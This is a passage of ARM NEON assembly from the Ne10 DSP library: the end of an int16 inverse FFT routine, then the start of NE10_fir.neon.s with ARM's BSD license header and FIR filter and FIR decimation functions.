beq .L_ne10_radix8_butterfly_inverse_scaled_first_stage
/* ---------------first stage: radix 4 */
mov count, fstride
mov p_fin0, p_fin
mov p_tmp, p_fout
add p_fin2, p_fin0, fstride, lsl #3 /* get the address of F[fstride*2] */
add p_fin1, p_fin0, fstride, lsl #2 /* get the address of F[fstride] */
add p_fin3, p_fin2, fstride, lsl #2 /* get the address of F[fstride*3] */
vld2.16 {q_in0_01}, [p_fin0:64]!
vld2.16 {q_in2_01}, [p_fin2:64]!
vld2.16 {q_in1_01}, [p_fin1:64]!
vld2.16 {q_in3_01}, [p_fin3:64]!
.L_ne10_radix4_butterfly_inverse_scaled_first_stage_fstride:
BUTTERFLY4X4_WITHOUT_TWIDDLES "TRUE", "TRUE"
subs count, count, #4
bgt .L_ne10_radix4_butterfly_inverse_scaled_first_stage_fstride
/* swap input/output buffer */
ldr tmp0, [sp, #104]
mov p_fin, p_fout
mov p_fout, tmp0
/* (stage_count-2): reduce the counter for the last stage */
sub stage_count, stage_count, #2
lsl nstep, fstride, #2
lsr fstride, fstride, #2
/* if the last stage */
cmp stage_count, #0
beq .L_ne10_butterfly_inverse_scaled_last_stages
bne .L_ne10_butterfly_inverse_scaled_other_stages
/* ---------------end of first stage: radix 4 */
/* ---------------first stage: radix 8 */
.L_ne10_radix8_butterfly_inverse_scaled_first_stage:
mov fstride1, fstride
mov p_in1, p_fin
mov p_out1, p_fout
lsl fstep, fstride, #2
.L_ne10_radix8_butterfly_inverse_scaled_first_stage_fstride1:
BUTTERFLY8X4_WITHOUT_TWIDDLES "TRUE", "TRUE"
subs fstride1, fstride1, #4
bgt .L_ne10_radix8_butterfly_inverse_scaled_first_stage_fstride1
lsl nstep, fstride, #3
sub stage_count, stage_count, #1
lsr fstride, fstride, #2
/* swap input/output buffer */
ldr tmp0, [sp, #104]
mov p_fin, p_fout
mov p_fout, tmp0
/* if the last stage */
cmp stage_count, #1
beq .L_ne10_butterfly_inverse_scaled_last_stages
/* (stage_count-1): reduce the counter for the last stage */
sub stage_count, stage_count, #1
/*--------------- end of first stage: radix 8 */
/* ---------------end of first stage--------------- */
/* ---------------other stages except last stage--------------- */
/* loop of other stages */
.L_ne10_butterfly_inverse_scaled_other_stages:
lsl mstep, mstride, #2
mov p_in1, p_fin
vld2.16 {d_fin0_r, d_fin0_i}, [p_in1:64], nstep
vld2.16 {d_fin1_r, d_fin1_i}, [p_in1:64], nstep
vld2.16 {d_fin2_r, d_fin2_i}, [p_in1:64], nstep
vld2.16 {d_fin3_r, d_fin3_i}, [p_in1:64], nstep
/* loop of fstride */
mov count_f, fstride
.L_ne10_butterfly_inverse_scaled_other_stages_fstride:
mov p_tw1, p_twiddles
sub tmp0, fstride, count_f
mul tmp0, tmp0, mstride
add p_out1, p_fout, tmp0, lsl #4
vld2.16 {d_tw0_r, d_tw0_i}, [p_tw1:64], mstep
vld2.16 {d_tw1_r, d_tw1_i}, [p_tw1:64], mstep
vld2.16 {d_tw2_r, d_tw2_i}, [p_tw1:64]
/* loop of mstride */
mov count_m, mstride
.L_ne10_butterfly_inverse_scaled_other_stages_mstride:
BUTTERFLY4X4_WITH_TWIDDLES "TRUE", "TRUE"
subs count_m, count_m, #4
bgt .L_ne10_butterfly_inverse_scaled_other_stages_mstride
/* end of mstride loop */
subs count_f, count_f, #1
bgt .L_ne10_butterfly_inverse_scaled_other_stages_fstride
add p_twiddles, p_twiddles, mstride, lsl #3
add p_twiddles, p_twiddles, mstride, lsl #2 /* get the address of twiddles += mstride*3 */
lsl mstride, mstride, #2
lsr fstride, fstride, #2
/* swap input/output buffer */
mov tmp0, p_fout
mov p_fout, p_fin
mov p_fin, tmp0
subs stage_count, stage_count, #1
bgt .L_ne10_butterfly_inverse_scaled_other_stages
/* ---------------end other stages except last stage--------------- */
/* ---------------last stage--------------- */
.L_ne10_butterfly_inverse_scaled_last_stages:
mov p_in1, p_fin
mov p_out1, p_out_ls
mov p_tw1, p_twiddles
mov mstep, nstep
vld2.16 {d_fin0_r, d_fin0_i}, [p_in1:64], nstep
vld2.16 {d_fin1_r, d_fin1_i}, [p_in1:64], nstep
vld2.16 {d_fin2_r, d_fin2_i}, [p_in1:64], nstep
vld2.16 {d_fin3_r, d_fin3_i}, [p_in1:64], nstep
vld2.16 {d_tw0_r, d_tw0_i}, [p_tw1:64], mstep
vld2.16 {d_tw1_r, d_tw1_i}, [p_tw1:64], mstep
vld2.16 {d_tw2_r, d_tw2_i}, [p_tw1:64]
/* loop of mstride */
mov count_m, mstride
.L_ne10_butterfly_inverse_scaled_last_stages_mstride:
BUTTERFLY4X4_WITH_TWIDDLES "TRUE", "TRUE"
subs count_m, count_m, #4
bgt .L_ne10_butterfly_inverse_scaled_last_stages_mstride
/* end of mstride loop */
/* ---------------end of last stage--------------- */
.L_ne10_butterfly_inverse_scaled_end:
/*Return From Function*/
vpop {q4-q7}
pop {r4-r12,pc}
/* end of ne10_mixed_radix_fft_backward_int16_scaled_neon */
/* end of the file */
.end
|
open-vela/external_Ne10 | 73,142 | modules/dsp/NE10_fir.neon.s | @
@ Copyright 2012-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@/*
@ * NE10 Library : dsp/NE10_fir.neon.s
@ */
@/*
@ * Note:
@ * 1. Currently, this is for soft VFP EABI, not for hard vfpv3 ABI yet
@ * 2. In the assembly code, we use D0-D31 registers. So VFPv3-D32 is used. In VFPv3-D16, there will be failure
@ */
#ifdef ENABLE_NE10_FIR_FLOAT_NEON
.text
.syntax unified
@/**
@ * @details
@ * This function operates on floating-point data types.
@ * There are no restrictions on numTaps and blockSize.
@ *
@ * The order of the coefficients in *coeffs should be
@ * bN, bN-1, bN-2, .....b1, b0
@ *
@ * <b>Cycle Count:</b>
@ *
@ * <code>45 + 8 * numTaps + 12.25 * blockSize + 4.375 * numTaps * blockSize</code>
@ *
@ * when the block size > 32, the tap is > 4, you could get
@ * maximized improvement
@ *
@ * @param[in] *S points to struct parameter
@ * @param[in] *pSrc points to the input buffer
@ * @param[out] *pDst points to the output buffer
@ * @param[in] blockSize block size of filter
@ */
.align 4
.global ne10_fir_float_neon
.extern ne10_qMaskTable32
.thumb
.thumb_func
ne10_fir_float_neon:
PUSH {r4-r12,lr} @push r12: to keep stack 8 bytes aligned
VPUSH {q4}
@/*ARM Registers*/
pStateStruct .req R0
pSrc .req R1
pDst .req R2
blockSize .req R3
pState .req R4 @/* State pointer */
pCoeffs .req R5 @/* Coefficient pointer */
pStateCurnt .req R6 @/* Points to the current sample of the state */
pX .req R7 @/* Temporary pointers for state buffer */
pB .req R8 @/* Temporary pointers for coefficient buffer */
numTaps .req R9 @/* Length of the filter */
tapCnt .req R10 @ /* Loop counter */
Count .req R11 @ /* Loop counter */
pTemp .req R11
pMask .req R14 @ /* Mask Table */
mask .req R12
@/*NEON variale Declaration*/
qInp .qn Q0.F32
dInp_0 .dn D0.F32
dInp_1 .dn D1.F32
qCoeff .qn Q1.F32
dCoeff_0 .dn D2.F32
dCoeff_1 .dn D3.F32
qZero .qn Q2.F32
qMask .qn Q3.U32
dMask_0 .dn D6.U32
dMask_1 .dn D7.U32
dOut_0 .dn D6.F32
dOut_1 .dn D7.F32
qAcc0 .qn Q8.F32
dAcc0_0 .dn D16.F32
dAcc0_1 .dn D17.F32
qTemp .qn Q9.F32
dTemp_0 .dn D18.F32
dTemp_1 .dn D19.F32
qTemp1 .qn Q10.F32
dTemp1_0 .dn D20.F32
dTemp1_1 .dn D21.F32
qTemp2 .qn Q11.F32
qTemp3 .qn Q12.F32
qMask1 .qn Q4.U32
dMask1_0 .dn D8.U32
dMask1_1 .dn D9.U32
qMaskTmp .qn Q14.U32
dMaskTmp_0 .dn D28.U32
dMaskTmp_1 .dn D29.U32
qAcc1 .qn Q3.F32
qAcc2 .qn Q13.F32
qAcc3 .qn Q15.F32
LDRH numTaps,[pStateStruct],#4
LDR pState,[pStateStruct],#4
LDR pCoeffs,[pStateStruct],#4
@/* S->state buffer contains previous frame (numTaps - 1) samples */
@/* pStateCurnt points to the location where the new input data should be written */
@/*pStateCurnt = &(S->state[(numTaps - 1u)])@*/
SUB mask,numTaps,#1
#ifdef __PIC__
@/* position-independent access of LDR pMask,=ne10_qMaskTable32 */
LDR pTemp,.L_PIC0_GOT_OFFSET
LDR pMask,.L_GOT_ne10_qMaskTable32
.L_PIC0:
ADD pTemp,pTemp,pc
LDR pMask,[pTemp,pMask]
#else
LDR pMask,=ne10_qMaskTable32
#endif
AND tapCnt,numTaps,#3
ADD pStateCurnt,pState,mask,LSL #2
AND mask,blockSize,#3
@/* Apply loop unrolling and compute 4 output values simultaneously.
@* The variables acc0 ... acc3 hold output values that are being computed:
@*
@* acc0 = b[numTaps-1] * x[n-numTaps-1] + b[numTaps-2] * x[n-numTaps-2] + b[numTaps-3] * x[n-numTaps-3] +...+ b[0] * x[0]
@* acc1 = b[numTaps-1] * x[n-numTaps] + b[numTaps-2] * x[n-numTaps-1] + b[numTaps-3] * x[n-numTaps-2] +...+ b[0] * x[1]
@* acc2 = b[numTaps-1] * x[n-numTaps+1] + b[numTaps-2] * x[n-numTaps] + b[numTaps-3] * x[n-numTaps-1] +...+ b[0] * x[2]
@* acc3 = b[numTaps-1] * x[n-numTaps+2] + b[numTaps-2] * x[n-numTaps+1] + b[numTaps-3] * x[n-numTaps] +...+ b[0] * x[3]
@*/
@/*If numTaps,blockSize are not multiples of 4, Get the appropriate Masks*/
ADD pTemp,pMask,tapCnt,LSL #4
VEOR qZero,qZero
ADD pX,pMask,mask,LSL #4
VLD1 {dMaskTmp_0,dMaskTmp_1},[pTemp]
VLD1 {dMask1_0,dMask1_1},[pX]
@/* Copy blockCnt number of new input samples into the state buffer */
SUBS blockSize,#4
BLT firEndOuterLoop
@/* Compute 4 outputs at a time*/
firOuterLoop:
VLD1 {dTemp_0,dTemp_1},[pSrc]!
MOV pX,pState
MOV pB,pCoeffs
@/* Read the first four samples from the state buffer:
@* x[n-numTaps], x[n-numTaps-1], x[n-numTaps-2],x[n-numTaps-3] */
VST1 {dTemp_0,dTemp_1},[pStateCurnt]!
@/* Zero the Accumulators*/
VEOR qAcc0,qAcc0
VLD1 {dInp_0,dInp_1},[pX]!
@//* Read the first four coefficients b[numTaps] to b[numTaps-3] */
VLD1 {dCoeff_0,dCoeff_1},[pB]!
@/* Loop unrolling. Process 4 taps at a time. */
SUBS tapCnt,numTaps,#4
VLD1 {dTemp_0,dTemp_1},[pX]!
BLT firEndInnerLoop
firInnerLoop:
VEXT qTemp1,qInp,qTemp,#1
@/* acc0 += b[numTaps] * x[n-numTaps-1]+ b[numTaps] * x[n-numTaps-2] +
@* b[numTaps] * x[n-numTaps-3] + b[numTaps] * x[n-numTaps-4]*/
VMLA qAcc0,qInp,dCoeff_0[0]
@/* acc1 += b[numTaps-1] * x[n-numTaps-2]+ b[numTaps-1] * x[n-numTaps-3] +
@b[numTaps-1] * x[n-numTaps-4] +*b[numTaps-1] * x[n-numTaps-5]*/
VMUL qAcc1,qTemp1,dCoeff_0[1]
VEXT qTemp2,qInp,qTemp,#2
@/* acc2 += b[numTaps-2] * x[n-numTaps-3]+ b[numTaps-2] * x[n-numTaps-4] +
@b[numTaps-2] * x[n-numTaps-5] + *b[numTaps-2] * x[n-numTaps-6]*/
VMUL qAcc2,qTemp2,dCoeff_1[0]
VADD qAcc0, qAcc0, qAcc1
VEXT qTemp3,qInp,qTemp,#3
@/* acc3 += b[numTaps-3] * x[n-numTaps-4]+ b[numTaps-3] * x[n-numTaps-5] +
@b[numTaps-3] * x[n-numTaps-6] +*b[numTaps-3] * x[n-numTaps-7] */
VMUL qAcc3,qTemp3,dCoeff_1[1]
VADD qAcc0, qAcc0, qAcc2
VMOV qInp,qTemp
VLD1 {dTemp_0,dTemp_1},[pX]!
VADD qAcc0, qAcc0, qAcc3
SUBS tapCnt,#4
@/* Read the b[numTaps-4] to b[numTaps-7] coefficients */
VLD1 {dCoeff_0,dCoeff_1},[pB]!
BGE firInnerLoop
firEndInnerLoop:
ADDS tapCnt, tapCnt, #4
BEQ firStoreOutput
@/* If the filter length is not a multiple of 4, compute the remaining filter taps */
@/*Select only the remaining filter Taps*/
VMOV qMask,qMaskTmp
VBSL qMask,qCoeff,qZero
VEXT qTemp1,qInp,qTemp,#1
VMLA qAcc0,qInp,dOut_0[0]
VEXT qTemp2,qInp,qTemp,#2
VMLA qAcc0,qTemp1,dOut_0[1]
VMLA qAcc0,qTemp2,dOut_1[0]
firStoreOutput:
@/* Advance the state pointer by 4 to process the next group of 4 samples */
ADD pState,#16
@/* The results in the 4 accumulators are in 2.30 format. Convert to 1.31
@ * Then store the 4 outputs in the destination buffer. */
SUBS blockSize,#4
VST1 {dAcc0_0,dAcc0_1},[pDst]!
BGE firOuterLoop
firEndOuterLoop:
@/*Handle BlockSize Not a Multiple of 4*/
ADDS blockSize,#4
BEQ firCopyData
@/*Copy the Remaining BlockSize Number of Input Sample to state Buffer*/
VMOV qMask,qMask1
VLD1 {dTemp1_0,dTemp1_1},[pStateCurnt]
VLD1 {dTemp_0,dTemp_1},[pSrc]
ADD pSrc,pSrc,blockSize,LSL #2
MOV pX,pState
MOV pB,pCoeffs
VBSL qMask,qTemp,qTemp1
VST1 {dMask_0,dMask_1},[pStateCurnt]
VLD1 {dInp_0,dInp_1},[pX]!
ADD pStateCurnt,pStateCurnt,blockSize, LSL #2
@/* Zero the Accumulators*/
VEOR qAcc0,qAcc0
VLD1 {dCoeff_0,dCoeff_1},[pB]!
SUBS tapCnt,numTaps,#4
VLD1 {dTemp_0,dTemp_1},[pX]!
BLT firEndInnerLoop1
firInnerLoop1:
VEXT qTemp1,qInp,qTemp,#1
VMLA qAcc0,qInp,dCoeff_0[0]
VEXT qTemp2,qInp,qTemp,#2
VMLA qAcc0,qTemp1,dCoeff_0[1]
VEXT qTemp3,qInp,qTemp,#3
VMLA qAcc0,qTemp2,dCoeff_1[0]
VMOV qInp,qTemp
VMLA qAcc0,qTemp3,dCoeff_1[1]
VLD1 {dCoeff_0,dCoeff_1},[pB]!
SUBS tapCnt,#4
VLD1 {dTemp_0,dTemp_1},[pX]!
BGE firInnerLoop1
firEndInnerLoop1:
VMOV qMask,qMaskTmp
VBSL qMask,qCoeff,qZero
VEXT qTemp1,qInp,qTemp,#1
VMLA qAcc0,qInp,dOut_0[0]
VEXT qTemp2,qInp,qTemp,#2
VMLA qAcc0,qTemp1,dOut_0[1]
VMLA qAcc0,qTemp2,dOut_1[0]
VMOV qMask,qMask1
VLD1 {dTemp_0,dTemp_1},[pDst]
@/* If the blockSize is not a multiple of 4, Mask the unwanted Output */
VBSL qMask,qAcc0,qTemp
VST1 {dMask_0,dMask_1},[pDst]
ADD pDst,pDst,blockSize,LSL #2
ADD pState,pState,blockSize,LSL #2
firCopyData:
@/* Processing is complete. Now shift the data in the state buffer down by
@** blockSize samples. This prepares the state buffer for the next function
@** call. */
@/* Points to the start of the state buffer */
SUB numTaps,numTaps,#1
AND mask,numTaps,#3
LDR pStateCurnt,[pStateStruct,#-8]
ADD pTemp,pMask,mask,LSL #4
VLD1 {dInp_0,dInp_1},[pState]!
VLD1 {dMask_0,dMask_1},[pTemp]
@/* copy data */
SUBS Count,numTaps,#4
BLT firEnd
firCopyLoop:
VST1 {dInp_0,dInp_1},[pStateCurnt]!
SUBS Count,#4
VLD1 {dInp_0,dInp_1},[pState]!
BGE firCopyLoop
firEnd:
VLD1 {dTemp_0,dTemp_1},[pStateCurnt]
VBSL qMask,qInp,qTemp
VST1 {dOut_0,dOut_1},[pStateCurnt]
ADD pStateCurnt,pStateCurnt,mask, LSL #2
@/*Return From Function*/
VPOP {q4}
POP {r4-r12,pc}
@/*ARM Registers*/
.unreq pStateStruct
.unreq pSrc
.unreq pDst
.unreq blockSize
.unreq pState
.unreq pCoeffs
.unreq pStateCurnt
.unreq pX
.unreq pB
.unreq numTaps
.unreq tapCnt
.unreq Count
.unreq pTemp
.unreq pMask
.unreq mask
@/*NEON variale Declaration*/
.unreq qInp
.unreq dInp_0
.unreq dInp_1
.unreq qCoeff
.unreq dCoeff_0
.unreq dCoeff_1
.unreq qZero
.unreq qMask
.unreq dMask_0
.unreq dMask_1
.unreq dOut_0
.unreq dOut_1
.unreq qAcc0
.unreq dAcc0_0
.unreq dAcc0_1
.unreq qTemp
.unreq dTemp_0
.unreq dTemp_1
.unreq qTemp1
.unreq dTemp1_0
.unreq dTemp1_1
.unreq qTemp2
.unreq qTemp3
.unreq qMask1
.unreq dMask1_0
.unreq dMask1_1
.unreq qMaskTmp
.unreq dMaskTmp_0
.unreq dMaskTmp_1
.unreq qAcc1
.unreq qAcc2
.unreq qAcc3
#endif
@/* ENABLE_NE10_FIR_FLOAT_NEON */
@/**
@ * @details
@ * This function operates on floating-point data types.
@ * There are no restrictions on numTaps and blockSize.
@ *
@ * The order of the coefficients in *coeffs should be
@ * bN, bN-1, bN-2, .....b1, b0
@ *
@ * <b>Cycle Count:</b>
@ *
@ * <code> Co + C1 * numTaps + C3 * blockSize * decimation Factor + c4 * numTaps * blockSize</code>
@ *
@ * when the block size > 32, the tap > 4, you could get
@ * maximized improvement
@ *
@ * @param[in] *S points to struct parameter
@ * @param[in] *pSrc points to the input buffer
@ * @param[out] *pDst points to the output buffer
@ * @param[in] blockSize block size of filter
@ */
#ifdef ENABLE_NE10_FIR_DECIMATE_FLOAT_NEON
.align 4
.global ne10_fir_decimate_float_neon
.extern ne10_qMaskTable32
.extern ne10_divLookUpTable
.thumb
.thumb_func
ne10_fir_decimate_float_neon:
PUSH {r4-r12,lr} @push r12: to keep stack 8 bytes aligned
VPUSH {d8-d9}
@/*ARM Registers*/
pStateStruct .req R0
pSrc .req R1
pDst .req R2
blockSize .req R3
pState .req R4 @/* State pointer */
pCoeffs .req R5 @/* Coefficient pointer */
decimationFact .req R6
outBlockSize .req R7
pX .req R6 @/* Temporary pointers for state buffer */
pB .req R8 @/* Temporary pointers for coefficient buffer */
numTaps .req R9 @/* Length of the filter */
tapCnt .req R10 @ /* Loop counter */
Count .req R11 @ /* Loop counter */
pTemp .req R11
blkCnt .req R11
pMask .req R14 @ /* Mask Table */
mask .req R12
Offset .req R12
@/*NEON variale Declaration*/
qInp0 .qn Q0.F32
dInp0_0 .dn D0.F32
dInp0_1 .dn D1.F32
qCoeff .qn Q1.F32
dCoeff_0 .dn D2.F32
dCoeff_1 .dn D3.F32
qZero .qn Q2.F32
qMask .qn Q3.U32
qMaskF32 .qn Q3.F32
dMask_0 .dn D6.U32
dMask_1 .dn D7.U32
dOut_0 .dn D6.F32
dOut_1 .dn D7.F32
qInp3 .qn Q4.F32
dInp3_0 .dn D8.F32
dInp3_1 .dn D9.F32
qAcc0 .qn Q8.F32
dAcc0_0 .dn D16.F32
dAcc0_1 .dn D17.F32
qTemp .qn Q9.F32
dTemp_0 .dn D18.F32
dTemp_1 .dn D19.F32
qInp1 .qn Q9.F32
dInp1_0 .dn D18.F32
dInp1_1 .dn D19.F32
qAcc1 .qn Q10.F32
dAcc1_0 .dn D20.F32
dAcc1_1 .dn D21.F32
qAcc2 .qn Q11.F32
dAcc2_0 .dn D22.F32
dAcc2_1 .dn D23.F32
qAcc3 .qn Q12.F32
dAcc3_0 .dn D24.F32
dAcc3_1 .dn D25.F32
qMask1 .qn Q13.U32
dMask1_0 .dn D26.U32
dMask1_1 .dn D27.U32
qMaskTmp .qn Q14.U32
dMaskTmp_0 .dn D28.U32
dMaskTmp_1 .dn D29.U32
qInp2 .qn Q15.F32
dInp2_0 .dn D30.F32
dInp2_1 .dn D31.F32
LDRB decimationFact,[pStateStruct],#2
LDRH numTaps,[pStateStruct],#2
LDR pCoeffs,[pStateStruct],#4
LDR pState,[pStateStruct],#4
@//outBlockSize = blockSize / S->M
#ifdef __PIC__
@/* position-independent access of LDR pMask,=ne10_divLookUpTable */
LDR pTemp,.L_PIC1_GOT_OFFSET
LDR pMask,.L_GOT_ne10_divLookUpTable
.L_PIC1:
ADD pTemp,pTemp,pc
LDR pMask,[pTemp,pMask]
#else
LDR pMask,=ne10_divLookUpTable
#endif
SUBS mask,decimationFact,#1
ADD pMask,pMask,mask,LSL #2
LDR mask,[pMask]
@//MOV pX,#0
SMULWB outBlockSize,blockSize,mask
CMP outBlockSize,#0
IT LT
RSBLT outBlockSize,#0
@/* S->state buffer contains previous frame (numTaps - 1) samples */
@/* pStateCurnt points to the location where the new input data should be written */
@//pStateCurnt = S->state + (numTaps - 1u)@
@/* Copy Blocksize number of new input samples into the state buffer */
#ifdef __PIC__
@/* position-independent access of LDR pMask,=ne10_qMaskTable32 */
LDR pTemp,.L_PIC2_GOT_OFFSET
LDR pMask,.L_GOT_ne10_qMaskTable32
.L_PIC2:
ADD pTemp,pTemp,pc
LDR pMask,[pTemp,pMask]
#else
LDR pMask,=ne10_qMaskTable32
#endif
SUB tapCnt,numTaps,#1
AND mask,blockSize,#3
ADD pB,pState,tapCnt,LSL #2
ADD mask,pMask,mask,LSL #4
VLD1 {dTemp_0,dTemp_1},[pSrc]!
VLD1 {dMask1_0,dMask1_1},[mask]
SUBS Count,blockSize,#4
LSL Offset,decimationFact, #2
VMOV qMask,qMask1
BLT firDecimateEndCopy
firDecimateCopyLoop:
VST1 {dTemp_0,dTemp_1},[pB]!
SUBS Count,#4
VLD1 {dTemp_0,dTemp_1},[pSrc]!
BGE firDecimateCopyLoop
firDecimateEndCopy:
VLD1 {dCoeff_0,dCoeff_1},[pB]
VBSL qMask,qTemp,qCoeff
VST1 {dMask_0,dMask_1},[pB]
ADD pB,pB,tapCnt,LSL #2
@// Load Mask Value
AND blkCnt,outBlockSize,#3
ADD blkCnt,pMask,blkCnt,LSL #4
VLD1 {dMask1_0,dMask1_1},[blkCnt]
@/*Load Mask Table Values*/
AND tapCnt,numTaps,#3
ADD pTemp,pMask,tapCnt,LSL #4
VEOR qZero,qZero,qZero
VLD1 {dMaskTmp_0,dMaskTmp_1},[pTemp]
@/*Handle 4 output samples at a time */
SUBS blkCnt,outBlockSize,#4
BLT firDecimateEndOuterLoop
@//blkCnt = outBlockSize>>2@
firDecimateOuterLoop:
@/* Set accumulator to zero */
VEOR qAcc0,qAcc0,qAcc0
VEOR qAcc1,qAcc1,qAcc1
VEOR qAcc2,qAcc2,qAcc2
VEOR qAcc3,qAcc3,qAcc3
@/* Initialize state pointer */
MOV pX,pState
@/* Initialize coeff pointer */
MOV pB,pCoeffs
SUBS tapCnt,numTaps,#4
VLD1 {dCoeff_0,dCoeff_1},[pB]!
VLD1 {dInp0_0,dInp0_1},[pX],Offset
VLD1 {dInp1_0,dInp1_1},[pX],Offset
VLD1 {dInp2_0,dInp2_1},[pX],Offset
VLD1 {dInp3_0,dInp3_1},[pX],Offset
SUB pX,pX,Offset, LSL #2
ADD pX,pX,#16
BLT firDecimateEndInnerLoop
firDecimateInnerLoop:
VMLA qAcc0,qCoeff,qInp0
VMLA qAcc1,qCoeff,qInp1
VMLA qAcc2,qCoeff,qInp2
VMLA qAcc3,qCoeff,qInp3
VLD1 {dCoeff_0,dCoeff_1},[pB]!
VLD1 {dInp0_0,dInp0_1},[pX],Offset
VLD1 {dInp1_0,dInp1_1},[pX],Offset
VLD1 {dInp2_0,dInp2_1},[pX],Offset
VLD1 {dInp3_0,dInp3_1},[pX],Offset
SUB pX,pX,Offset, LSL #2
ADD pX,pX,#16
SUBS tapCnt,#4
BGE firDecimateInnerLoop
firDecimateEndInnerLoop:
@/* If the filter length is not a multiple of 4, compute the remaining filter taps */
VMOV qMask,qMaskTmp
VBSL qMask,qCoeff,qZero
VMLA qAcc0,qMaskF32,qInp0
VMLA qAcc1,qMaskF32,qInp1
VMLA qAcc2,qMaskF32,qInp2
VMLA qAcc3,qMaskF32,qInp3
VADD dAcc0_0,dAcc0_0,dAcc0_1
VADD dAcc1_0,dAcc1_0,dAcc1_1
VADD dAcc2_0,dAcc2_0,dAcc2_1
VADD dAcc3_0,dAcc3_0,dAcc3_1
VPADD dAcc0_0,dAcc0_0,dAcc1_0
VPADD dAcc0_1,dAcc2_0,dAcc3_0
ADD pState,pState,Offset,LSL #2
VST1 {dAcc0_0,dAcc0_1},[pDst]!
SUBS blkCnt,#4
BGE firDecimateOuterLoop
firDecimateEndOuterLoop:
@/*Handle BlockSize Not a Multiple of 4*/
ADDS blkCnt,#4
BEQ firDecimateCopyData
@/* Set accumulator to zero */
VEOR qAcc0,qAcc0,qAcc0
VEOR qAcc1,qAcc1,qAcc1
VEOR qAcc2,qAcc2,qAcc2
VEOR qAcc3,qAcc3,qAcc3
@/* Initialize state pointer */
MOV pX,pState
@/* Initialize coeff pointer */
MOV pB,pCoeffs
SUBS tapCnt,numTaps,#4
VLD1 {dCoeff_0,dCoeff_1},[pB]!
VLD1 {dInp0_0,dInp0_1},[pX],Offset
VLD1 {dInp1_0,dInp1_1},[pX],Offset
VLD1 {dInp2_0,dInp2_1},[pX],Offset
VLD1 {dInp3_0,dInp3_1},[pX],Offset
SUB pX,pX,Offset, LSL #2
ADD pX,pX,#16
BLT firDecimateEndInnerLoop1
firDecimateInnerLoop1:
VMLA qAcc0,qCoeff,qInp0
VMLA qAcc1,qCoeff,qInp1
VMLA qAcc2,qCoeff,qInp2
VMLA qAcc3,qCoeff,qInp3
VLD1 {dCoeff_0,dCoeff_1},[pB]!
VLD1 {dInp0_0,dInp0_1},[pX],Offset
VLD1 {dInp1_0,dInp1_1},[pX],Offset
VLD1 {dInp2_0,dInp2_1},[pX],Offset
VLD1 {dInp3_0,dInp3_1},[pX],Offset
SUB pX,pX,Offset, LSL #2
ADD pX,pX,#16
SUBS tapCnt,#4
BGE firDecimateInnerLoop1
firDecimateEndInnerLoop1:
@/* If the filter length is not a multiple of 4, compute the remaining filter taps */
VMOV qMask,qMaskTmp
VBSL qMask,qCoeff,qZero
VMLA qAcc0,qMaskF32,qInp0
VMLA qAcc1,qMaskF32,qInp1
VMLA qAcc2,qMaskF32,qInp2
VMLA qAcc3,qMaskF32,qInp3
VADD dAcc0_0,dAcc0_0,dAcc0_1
VADD dAcc1_0,dAcc1_0,dAcc1_1
VADD dAcc2_0,dAcc2_0,dAcc2_1
VADD dAcc3_0,dAcc3_0,dAcc3_1
MUL Offset,Offset,blkCnt
VPADD dAcc0_0,dAcc0_0,dAcc1_0
VPADD dAcc0_1,dAcc2_0,dAcc3_0
ADD pState,pState,Offset
VMOV qMask,qMask1
VLD1 {dTemp_0,dTemp_1},[pDst]
VBSL qMask,qAcc0,qTemp
VST1 {dMask_0,dMask_1},[pDst]
ADD pDst,pDst,blkCnt,LSL #2
firDecimateCopyData:
@/* Processing is complete. Now shift the data in the state buffer down by
@** blockSize samples. This prepares the state buffer for the next function
@** call. */
@/* Points to the start of the state buffer */
SUB numTaps,numTaps,#1
AND mask,numTaps,#3
LDR pX,[pStateStruct,#-4]
ADD pTemp,pMask,mask,LSL #4
VLD1 {dInp0_0,dInp0_1},[pState]!
VLD1 {dMask_0,dMask_1},[pTemp]
@/* copy data */
SUBS Count,numTaps,#4
BLT firDecimateEnd
firDecimateCopyLoop1:
VST1 {dInp0_0,dInp0_1},[pX]!
SUBS Count,#4
VLD1 {dInp0_0,dInp0_1},[pState]!
BGE firDecimateCopyLoop1
firDecimateEnd:
VLD1 {dTemp_0,dTemp_1},[pX]
VBSL qMask,qInp0,qTemp
VST1 {dOut_0,dOut_1},[pX]
ADD pX,pX,mask, LSL #2
@// Return From Function
VPOP {d8-d9}
POP {r4-r12,pc}
@/*ARM Registers*/
.unreq pStateStruct
.unreq pSrc
.unreq pDst
.unreq blockSize
.unreq pState
.unreq pCoeffs
.unreq decimationFact
.unreq outBlockSize
.unreq pX
.unreq pB
.unreq numTaps
.unreq tapCnt
.unreq Count
.unreq pTemp
.unreq blkCnt
.unreq pMask
.unreq mask
.unreq Offset
@/*NEON variale Declaration*/
.unreq qInp0
.unreq dInp0_0
.unreq dInp0_1
.unreq qCoeff
.unreq dCoeff_0
.unreq dCoeff_1
.unreq qZero
.unreq qMask
.unreq qMaskF32
.unreq dMask_0
.unreq dMask_1
.unreq dOut_0
.unreq dOut_1
.unreq qInp3
.unreq dInp3_0
.unreq dInp3_1
.unreq qAcc0
.unreq dAcc0_0
.unreq dAcc0_1
.unreq qTemp
